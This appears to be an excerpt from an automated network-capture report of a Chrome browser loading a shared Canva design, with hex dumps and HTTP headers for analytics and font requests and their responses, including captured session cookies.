                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: f1 d0 b0 9a e0 81 c1 ef 25 d4 7d 96 82 8d 34 f7 14 77 7b 81 20 2a 14 92 42 81 5b 09 03 4a 52 98 52 55 53 78 63 1a e5 62 47 ca 1c 29 70 a4 b4 48 5b cb cb 87 13 a6 7f fa bf 6b 6a 1a 5f d6 c8 5a 07 f3 cf 4b c9 39 a6 53 df 8d 48 ef bf 04 b9 7a f5 b7 83 eb 8f 5b fb c3 d0 19 77 35 c0 70 91 28 e5 9d 14 94 92 42 33 8a 24 fd 98 3c 05 e6 ef 1b 7d bf 3e 35 75 7f 22 ff 3f bb 41 0e 8c 92 d0 04 8b 94 28 45 9e 39 ca ad bc 58 65 90 22 5b 5d 11 94 be ed 23 ed 3e ea b6 af c6 d2 ed f9 bb f3 11 e2 17 74 6c 51 92 a4 ca 37 d7 62 ab ee d6 ce 95 ab d7 46 c3 97 49 94 2e 18 42 f0 09 a5 29 30 4f 85 d5 21 c6 75 ac d7 c6 83 41 67 d1 ba f2 c3 21 90 2c 5d a1 f9 96 58 03 e3 aa 56 bb 96 1f b3 18 6d 45 68 5d 9d 32 43 91 12 95 d6 1a e3 1a d7 6b d3 89 bf 50 b1 52 30 85 89 21 96 a9 58 a9 a5
                                                                                                                                                                                                                                                    Data Ascii: %}4w{ *B[JRRUSxcbG)pH[kj_ZK9SHz[w5p(B3$<}>5u"?A(E9Xe"[]#>tlQ7bFI.B)0O!uAg!,]XVmEh]2CkPR0!X
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: ac 88 7a 18 2e 58 87 e0 00 2e 24 0d 00 4b b7 2b a2 0d 18 69 c5 07 27 16 30 0c 47 58 c2 00 48 bc 7e ec 27 7e a6 31 45 f4 ec e8 1d f7 5d ca b4 53 95 82 91 c8 61 6c 9f 9e 54 35 60 80 05 a6 e2 b9 db dc 28 17 e4 9e 61 20 52 59 2e a1 bd 9c 29 f0 20 3d 27 7b 93 8a 58 d3 ff 59 27 eb 2f 75 51 a8 ce e8 9c ee 98 65 04 8c 84 71 b4 de e5 1e f2 ac 4f be 38 5d bd 52 fd 5e f3 4c ec c5 51 9c c6 45 3c 8d 8f e3 4b 8d 48 93 ae 29 d7 54 69 0e 78 38 25 cd 24 4e d2 a4 48 c6 c9 57 0f ae 47 8b 96 6a 47 fb b8 f6 a9 b4 91 7a 69 94 96 e9 ad 36 42 2b f0 94 7a de b5 7c 66 f9 c1 f3 98 bc da ab 7e e7 45 2b c7 6e d1 fd 97 31 dc 78 e2 8d fb ff b4 e3 7f 82 06 41 88 c0 ea 22 55 7d 1d ad 3f 54 a1 50 9d d6 39 35 1b 0c 8f 11 31 8e d6 09 82 29 c7 7d a7 79 3a 6e c5 41 1c cb db 9b 2e d3 e4 e9 5f
                                                                                                                                                                                                                                                    Data Ascii: z.X.$K+i'0GXH~'~1E]SalT5`(a RY.) ='{XY'/uQeqO8]R^LQE<KH)Tix8%$NHWGjGzi6B+z|f~E+n1xA"U}?TP951)}y:nA._
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: b8 67 15 ef 79 95 7b 51 c9 5e 56 b1 d5 76 ef 55 f5 7b 5d d7 de d4 da db de d5 be f7 4d ec 43 a3 7d ec 53 63 fb dc de ad 75 61 5f 5a da 7a 97 b7 d1 d5 7d ed e6 be 75 ed f8 fe 5b 21 c5 fd 03 2d ef e7 cb 75 ff 42 6f fb 7d ff 91 79 ff c5 cb be ff a1 3b 1f ff 7f e2 0d 27 08 80 37 90 60 0c c8 c0 05 e4 c0 08 90 0b 7c 80 dc 30 16 e4 81 60 90 17 fc 01 f2 86 30 90 0f fc 0d f2 85 70 90 1f fc 03 f2 87 10 50 00 fc 09 0a 84 28 50 10 fc 0f 0a 86 68 50 08 4c 01 85 42 52 50 18 cc 05 85 43 1c 28 02 a6 83 22 21 31 28 0a 66 83 a2 21 19 28 06 e6 81 62 21 1e 14 07 33 40 f1 90 0a 94 00 8b 40 89 20 25 28 31 2c 04 25 81 34 a0 a4 b0 04 94 0c 52 83 92 c3 62 50 0a 48 0f 4a 09 cb 41 a9 20 1d 28 35 2c 03 a5 81 5c a0 b4 b0 19 94 0e 72 80 d2 c3 46 50 06 c8 0c ca 08 ab 41 99 20 27 28 33
                                                                                                                                                                                                                                                    Data Ascii: gy{Q^VvU{]MC}Scua_Zz}u[!-uBo}y;'7`|0`0pP(PhPLBRPC("!1(f!(b!3@@ %(1,%4RbPHJA (5,\rFPA '(3
                                                                                                                                                                                                                                                    2024-12-19 21:27:32 UTC1369INData Raw: 58 d1 ea 7a e8 c7 7b 52 d1 2a 33 72 31 70 1d 6b 35 44 3b a3 15 55 2a 1c 5c 12 a2 35 49 3d ec d6 a5 ac a2 19 e9 1a 7c 6d b0 95 2d 23 6c b4 1c f2 9e ad f4 db 9f 4c f5 5a 9b 9d 1f 00 1d 31 a9 71 69 92 8e ab 53 c2 97 37 bd 35 62 b5 63 39 52 47 e6 5a db fc 47 cd d8 0c 75 78 13 d0 a8 73 f9 ea fc 8b 15 37 94 7a 0a 3e 83 ce c0 36 f0 2e 8c 48 12 2e a8 fc 3d 65 95 06 03 d2 5f 9c 69 5c 12 49 34 b1 b2 eb 33 7d ef eb 13 56 1b f9 75 22 d6 ed b7 fc ca ce da 36 d6 cb d6 15 da c8 30 b9 67 9a f3 89 48 aa a3 11 2a cf 6a ce 5d ae 6f 40 8f 90 cc 0b c8 7b 28 e7 b1 ab 92 1e 1b e9 a7 75 39 a6 f7 ad dc 39 fe 5c 31 34 c2 e5 a5 b0 6b 29 eb 1c 35 cc e4 95 33 d1 d4 44 f4 37 6d 06 5c a9 4f 42 e2 f4 97 a8 6e 93 1b 28 32 b8 f2 ae a7 99 1c 06 ac cd 2d 56 13 a9 ce 10 ed 53 42 20 a9 e7 ad
                                                                                                                                                                                                                                                    Data Ascii: Xz{R*3r1pk5D;U*\5I=|m-#lLZ1qiS75bc9RGZGuxs7z>6.H.=e_i\I43}Vu"60gH*j]o@{(u99\14k)53D7m\OBn(2-VSB


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    43192.168.2.449791104.16.103.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC2132OUTPOST /_ajax/ae/createBatch HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Content-Length: 3260
                                                                                                                                                                                                                                                    X-Canva-Brand: BAAAAAAAAAA
                                                                                                                                                                                                                                                    X-Canva-App: responsive_design_viewer
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    X-Canva-Build-Sha: e404dd6
                                                                                                                                                                                                                                                    X-Csrf-Token: Yzy1uD0I9GT_B9ypZbbQGK0r5qOlIcQ_PeqpudldO8IdMaoCmBoSvbrl3Hh6B9GL1gyOOuPINaA6kk4fV9uPuktO7bs
                                                                                                                                                                                                                                                    X-Canva-User: UAAAAAAAAAA
                                                                                                                                                                                                                                                    X-Canva-Analytics: AAQAA1dFQgAA
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                    X-Canva-Request: recordanalyticseventbatch
                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                    X-Canva-Locale: en
                                                                                                                                                                                                                                                    X-Canva-Build-Name: 20241217-21
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC3260OUTData Raw: 7b 22 41 22 3a 5b 7b 22 41 3f 22 3a 22 44 22 2c 22 41 22 3a 7b 22 41 22 3a 22 36 66 66 66 62 30 32 32 2d 37 63 32 62 2d 34 64 31 64 2d 39 62 66 37 2d 38 62 38 36 37 61 66 33 35 64 30 39 22 2c 22 45 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 32 31 3a 32 37 3a 32 35 2e 33 36 39 5a 22 2c 22 46 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 32 31 3a 32 37 3a 32 37 2e 36 31 32 5a 22 2c 22 48 22 3a 22 65 6e 22 2c 22 49 22 3a 7b 22 41 22 3a 22 55 53 22 7d 2c 22 4a 22 3a 22 57 45 42 22 2c 22 4b 22 3a 7b 22 41 41 54 53 4f 22 3a 22 41 31 22 2c 22 57 4b 44 55 49 22 3a 22 41 22 2c 22 56 53 45 4d 4c 22 3a 22 43 22 2c 22 54 53 51 52 4c 22 3a 22 42 22 2c 22 54 4f 4d 4c 4f 22 3a 22 41 22 2c 22 53 45 4f 50 53 22 3a 22 43 22 2c 22 52 52 53 4e 43 22 3a 22 41 22 2c 22 52 52 53 43
                                                                                                                                                                                                                                                    Data Ascii: {"A":[{"A?":"D","A":{"A":"6fffb022-7c2b-4d1d-9bf7-8b867af35d09","E":"2024-12-19T21:27:25.369Z","F":"2024-12-19T21:27:27.612Z","H":"en","I":{"A":"US"},"J":"WEB","K":{"AATSO":"A1","WKDUI":"A","VSEML":"C","TSQRL":"B","TOMLO":"A","SEOPS":"C","RRSNC":"A","RRSC
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1092INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:31 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a26ec5b0cbc-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: accept-encoding
                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors 'self' https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    x-frame-options: sameorigin
                                                                                                                                                                                                                                                    x-request-id: 8f4a7a26ec5b0cbc
                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1v8%2FqaR%2FSIL8mwTTnQuILvrkgDhFzq1zCIyqT3%2Fss7WFljaXyBOydTjzRzZL2Wx%2BGLs9C3Na7Jgslq%2B0ndzkKFiAFoXLWhuwIBEZK37nFpIub8gNDx%2FuqiuexMQnIOM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC28INData Raw: 31 36 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 7d 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 16'"])}while(1);</x>//{}
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    44192.168.2.449789104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC636OUTGET /YAFdJjTk5UU/0/CanvaSans-MediumItalic.2114be9bf82cd092e.e5e43f51d6d7939d8911c861efa5f9b7.woff2 HTTP/1.1
                                                                                                                                                                                                                                                    Host: font-public.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:31 GMT
                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                    Content-Length: 43356
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a277af58cc0-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 1779703
                                                                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                    ETag: "9826acef05bd6cd0d11f682a193401df"
                                                                                                                                                                                                                                                    Expires: Fri, 19 Dec 2025 21:27:31 GMT
                                                                                                                                                                                                                                                    Last-Modified: Tue, 14 Mar 2023 06:04:12 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_font-public
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-id-2: jHidDpHdS7f8hZ7NmdgZJZVLGHIH/f/MwVkEgjOVqgYJ5uOgRzFbwddxSiVI5zXwasI7vTkfdxA=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: E8J0CWQWXHVZ9NTH
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: _EMjSRUw8DDfqAnYBpLjTYDUk_TRtnB2
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC781INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 6a 4c 39 4b 45 53 71 34 49 6e 59 2e 72 41 33 6e 38 5a 70 61 31 31 5f 59 37 6d 61 53 6f 66 6c 38 7a 56 39 73 32 71 5f 4e 42 71 6b 2d 31 37 33 34 36 34 33 36 35 31 2d 31 2e 30 2e 31 2e 31 2d 72 65 61 41 76 68 4c 6f 5a 42 36 31 52 34 47 47 46 31 4e 6a 74 50 59 32 4e 57 33 57 31 70 50 4b 4e 2e 33 6b 39 37 6a 36 73 38 47 75 59 4b 58 64 41 4a 30 55 2e 37 6b 44 71 50 4a 67 65 41 6d 56 35 57 4e 45 71 50 77 4b 59 49 71 79 43 6b 48 76 43 51 51 67 79 77 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 33 31 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=jL9KESq4InY.rA3n8Zpa11_Y7maSofl8zV9s2q_NBqk-1734643651-1.0.1.1-reaAvhLoZB61R4GGF1NjtPY2NW3W1pPKN.3k97j6s8GuYKXdAJ0U.7kDqPJgeAmV5WNEqPwKYIqyCkHvCQQgyw; path=/; expires=Thu, 19-Dec-24 21:57:31 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 77 4f 46 32 00 01 00 00 00 00 a9 5c 00 11 00 00 00 01 e9 1c 00 00 a8 f8 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 81 44 1b eb 42 1c a0 6c 06 60 00 af 6e 08 81 02 09 9c 15 11 08 0a 85 a1 5c 84 d7 24 0b 89 3e 00 01 36 02 24 03 92 3a 04 20 05 91 7b 07 a1 7b 0c 81 4b 5b f7 bd 91 01 3a 65 dd b8 27 1c 23 aa 6e 32 a0 ec 97 66 ce 4f a1 5c 57 50 1d 6b 61 1e cd 41 74 de e4 27 a8 6a 06 2a 19 db b2 18 06 dd 81 68 8a e7 2f 04 d9 ff ff ff ff 2f 4a 16 cf b8 7e 66 cb ec ee ab 94 00 5c 70 9d c3 fd 0f b2 dc 1d 21 f6 c8 e0 28 4d 66 db 2d fb b6 6d a8 c3 32 33 87 c1 57 cb d2 25 15 b5 c2 28 04 9a f5 26 b5 65 d1 6e cf 07 3f b6 ce e1 c2 89 0f 2d ce 35 8f 95 bf 70 56 44 20 e8 48 7b f8 1e 85 b6 08 0d 81 7d 20 07 5a 62 0a 5c 1a 71 83 2b a6 55 bf a2
                                                                                                                                                                                                                                                    Data Ascii: wOF2\DBl`n\$>6$: {{K[:e'#n2fO\WPkaAt'j*h//J~f\p!(Mf-m23W%(&en?-5pVD H{} Zb\q+U
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: f6 e6 27 c0 e0 92 ee 68 6a 64 84 c9 41 48 9c 4b a9 8f 56 b6 1e 4f e9 12 87 2a 4d d3 85 46 78 6c b7 a5 0a 65 56 22 25 7f 6f aa 55 fa ff 6f 80 02 8d 76 89 d1 d4 2d 35 da 40 5c cb 29 cd d5 6a 6e a6 ea 52 d0 48 5a 63 5c bc 1b ad 6f bc df 1f 1f bf 7f 37 41 74 83 14 80 96 21 41 6a 86 24 c6 50 c0 18 8a 1c 83 ee 06 29 10 a4 66 29 33 77 1a ad 31 46 b3 c6 d3 8c a5 c6 89 d2 7a 1f ed 6d 76 76 8d d7 9e 77 99 4d 82 ab 8b b6 2e da 2c bc 20 ba ab fc 82 28 bc 24 b5 f0 ff b9 f6 da 9c d9 dc 82 06 54 a8 ca c2 65 32 5b 2b fe e7 b4 7d 05 54 5f 55 31 08 b3 93 a2 ae f5 2d fb d9 e9 2a 62 8f d9 26 af 44 c8 f5 ee 98 23 4e 11 bb 21 bb 98 85 50 5f a3 78 5f a1 b1 12 21 05 42 69 08 36 16 56 2f 08 0a 4b d1 10 c2 ea 33 3f 58 42 5c 3e 21 cc 33 3c df 9c 68 f3 69 02 17 38 63 e7 9e 10 62 b4
                                                                                                                                                                                                                                                    Data Ascii: 'hjdAHKVO*MFxleV"%oUov-5@\)jnRHZc\o7At!Aj$P)f)3w1FzmvvwM., ($Te2[+}T_U1-*b&D#N!P_x_!Bi6V/K3?XB\>!3<hi8cb
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 3c 72 03 df c4 4d b8 1d 75 24 21 64 36 3b 6d 95 c6 b3 e2 57 d5 03 38 1c 3d 9e ec 1d 90 60 ca 93 0c 69 01 36 aa 31 30 75 14 06 5c 9e 37 b9 8c ac 71 91 4d a3 90 a5 10 f9 56 dd 5e 6d 51 bc b7 99 98 8b da cc fe 2d 75 30 f2 20 66 98 0b 99 57 d4 3c aa 5b 6d 54 5d f9 ff 01 34 42 00 a6 ed 32 41 30 69 8c ab af 6c a6 2a 83 78 45 08 b2 bb 2b c9 e6 4f ce f1 2a 6a 16 48 81 d5 a9 d9 97 76 49 c4 fb fd 62 13 c3 0a bd f3 09 a6 26 71 bf da d1 a1 e7 21 e3 97 bc ae a4 d8 f3 cb 08 a6 dd c3 5a d2 3a de 4e c1 66 a7 bf e3 0a 75 1e bb 70 8a 8d 26 f6 62 24 47 48 4c 0a c6 aa 69 26 a8 3f 9a cf 99 a5 cd 5a dd eb 72 88 e5 05 d2 b9 83 f3 2d 70 c5 84 78 c2 f6 ce a6 06 61 6d 26 a3 7a 26 cf 35 d3 83 34 6a 8c 86 42 68 b8 13 65 2d 97 d1 e5 8e 1c 98 64 5f fe 3c 77 6d b5 f0 50 8e 55 4d cc bc
                                                                                                                                                                                                                                                    Data Ascii: <rMu$!d6;mW8=`i610u\7qMV^mQ-u0 fW<[mT]4B2A0il*xE+O*jHvIb&q!Z:Nfup&b$GHLi&?Zr-pxam&z&54jBhe-d_<wmPUM
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: a0 b8 ec 4c 00 a1 e6 29 65 43 21 87 29 e5 ac 14 d4 d1 c0 8d d4 76 5e 88 7d fc ab fe 29 b3 b2 41 97 53 ce a3 c5 fc 14 a2 28 12 ae d2 2a a7 8a 50 31 5d 07 aa 85 2e 0d 84 63 9f cd 54 2c b1 01 80 63 bb 4c 78 7f f5 5a 3f 1b 22 9a 38 31 9a 44 39 e5 38 cd bd 26 4b 68 60 32 8e 88 0f 91 aa 54 50 40 0d 1d 8c cc 62 c4 6e 9a ac 5d da 2b 05 c8 c2 58 8c 5c 12 65 e4 f2 2a 95 50 95 1a d2 da 1a 3d 0c 31 a1 39 56 86 bc 7a ab 88 69 36 f6 43 2f 4e a7 af fb b1 c7 2a bf 53 6f 4d b9 e3 8f 40 aa 01 41 7d 10 02 4b 22 1c 11 75 51 e4 e8 c6 08 4b 87 b8 84 83 c0 a5 18 24 73 57 ef 49 29 41 00 07 0d d3 4b 68 62 56 15 0e e6 26 f4 c9 05 b1 88 91 b8 5c 4a c8 b2 02 56 66 61 8d 9a d4 a1 3e 8d e4 a6 44 16 3a b4 a6 1d 0e cf ce a1 db e4 d9 3e 45 fe ff 18 ac 0d 1a 26 21 01 86 f0 62 24 55 2a 30
                                                                                                                                                                                                                                                    Data Ascii: L)eC!)v^})AS(*P1].cT,cLxZ?"81D98&Kh`2TP@bn]+X\e*P=19Vzi6C/N*SoM@A}K"uQK$sWI)AKhbV&\JVfa>D:>E&!b$U*0
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: 5d 73 dd 0d 37 35 69 d1 a6 5d 47 08 2d f7 dc f7 de 07 9f f4 86 68 08 12 6c 95 10 a1 22 c4 da 62 ab 6d b6 2b 54 a2 c2 79 0a 95 6a 5d 50 ef 5a 2c 54 81 36 90 0e c2 28 98 21 30 7d 6c 0d 38 70 67 c8 33 ad 5f 0e 96 e6 d8 c3 0a c6 b6 4f 0a 70 bc 5c 4c f9 ce 11 aa 50 c9 40 ad 5a 26 2e b8 c0 d4 65 d7 99 b9 a9 97 ad 11 24 ac 4c 0b b1 60 7d ba 88 0b 1b 60 8c 94 38 15 e4 6a 67 a2 72 ce b9 68 79 26 a3 fb e0 a5 58 b9 ac a6 04 b9 b2 60 c2 5c d5 91 08 82 b3 ec 0e 7f 06 f4 44 c0 25 01 4c 88 75 06 7c f6 35 3a 2d 56 bc 2c e2 2f 4c 9a e3 ce 28 a3 d0 a0 49 ab d0 df ce 07 10 a2 e4 69 e7 0a 46 94 38 25 a0 46 a6 05 55 56 b9 c0 81 91 3b 8d 46 19 d1 7d 9d 5b d8 5f c6 b0 30 10 e8 68 30 84 42 02 3d 60 ea 91 28 81 1f a9 52 38 91 29 43 1c 25 95 90 45 59 65 44 51 55 15 7e d4 54 83 1e
                                                                                                                                                                                                                                                    Data Ascii: ]s75i]G-hl"bm+Tyj]PZ,T6(!0}l8pg3_Op\LP@Z&.e$L`}`8jgrhy&X`\D%Lu|5:-V,/L(IiF8%FUV;F}[_0h0B=`(R8)C%EYeDQU~T
                                                                                                                                                                                                                                                    2024-12-19 21:27:31 UTC1369INData Raw: b6 c9 60 82 34 39 8a 54 a8 d3 a2 cb c0 ce d8 f9 ed 1a 67 2c d9 00 70 ec d2 bd d7 f6 f7 22 02 74 6b ab 08 04 38 28 b0 10 20 43 83 09 47 93 ef 0e 4b 50 11 52 14 a8 d1 61 c4 82 1d 97 ca 6b 12 35 40 98 18 49 32 e4 29 51 a5 a1 6a 9b 24 ed 31 64 c2 9c 15 5b f6 9d ba be ff f1 1f 09 5f 93 f7 f6 6f 3d 04 01 05 01 1a 1c 44 28 5a 74 ad 16 0b 2e 02 c4 c8 50 a2 41 8f 49 d3 ea b1 c9 0c 1d b8 f1 11 24 42 9c 14 59 0a fe bd b2 d3 a5 4f 27 2d ab 10 76 1b 91 e5 cd 10 6a 77 8c 77 33 23 fb f6 a6 08 6b 8e 4b 4b bd c4 2b e7 de d5 03 b5 a4 96 d5 ba 2a 6a 43 6d aa 2d 95 55 25 56 22 ca b2 d7 91 93 5e 53 eb 9e 32 ee a0 e9 f2 11 27 ef cf 56 9d 46 6d 1e e8 f6 56 bf a1 7e c2 88 85 44 aa aa a3 31 08 48 9d 8d 58 c2 3f d1 32 2d bd 07 0e 0f c9 37 f9 8a 9e f6 b7 c5 db 71 77 06 3a ae b0 d0
                                                                                                                                                                                                                                                    Data Ascii: `49Tg,p"tk8( CGKPRak5@I2)Qj$1d[_o=D(Zt.PAI$BYO'-vjww3#kKK+*jCm-U%V"^S2'VFmV~D1HX?2-7qw:
